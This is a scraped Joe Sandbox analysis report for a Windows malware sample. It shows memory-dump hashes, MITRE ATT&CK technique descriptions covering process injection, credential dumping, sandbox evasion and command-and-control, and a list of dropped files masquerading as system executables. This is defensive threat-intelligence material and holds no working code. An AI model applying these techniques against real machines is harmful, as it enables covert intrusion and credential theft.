Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b890000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c766b90fb4a6eaeef74637036da0cf545be87f0b8a4e595d3ed6609e39cf67
Instruction ID: cecbd05d577c4ba539961f5459fc52c6975c0c4e81780a78f6ad37883fd0d79f
Opcode Fuzzy Hash: b1c766b90fb4a6eaeef74637036da0cf545be87f0b8a4e595d3ed6609e39cf67
Instruction Fuzzy Hash: 3FD06720E2855A8AEB58AB94D865ABDAAB1FF44304F400579D019AA2DEDF7825014741

Function 00007FFD9B8B7F20 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.1943319830.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_7ffd9b8b0000_FDhouUKjYnvlBIdtOklvQSsmeAjQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a9ccc05a214523d948bc7d4f65cd7fcb377f74db3e39bb40074f6e3e682ff6
Instruction ID: 67d53e354f251dcba84e2b6e25a73e06fcb6f8a4c3571c903f3a0e00befe6abf
Opcode Fuzzy Hash: 97a9ccc05a214523d948bc7d4f65cd7fcb377f74db3e39bb40074f6e3e682ff6
Instruction Fuzzy Hash: D4A00208DA791E01D81936FA1E9709874545B8D116FC62660E80880196E88E16E946D7

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YGk3y6Tdix.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Drivers\5b884080fd4f94

C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe

C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

C:\Drivers\QSdmXzK8rClLDrHgb.bat

C:\Drivers\f8dafbcfe7f5f1

C:\Drivers\fontdrvhost.exe

C:\Program Files\Internet Explorer\SIGNUP\c5b4cb5e9653cc

C:\Program Files\Internet Explorer\SIGNUP\services.exe

C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

C:\Recovery\f8dafbcfe7f5f1

C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe

C:\Users\Default\AppData\Local\f8dafbcfe7f5f1

Windows Analysis Report
YGk3y6Tdix.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre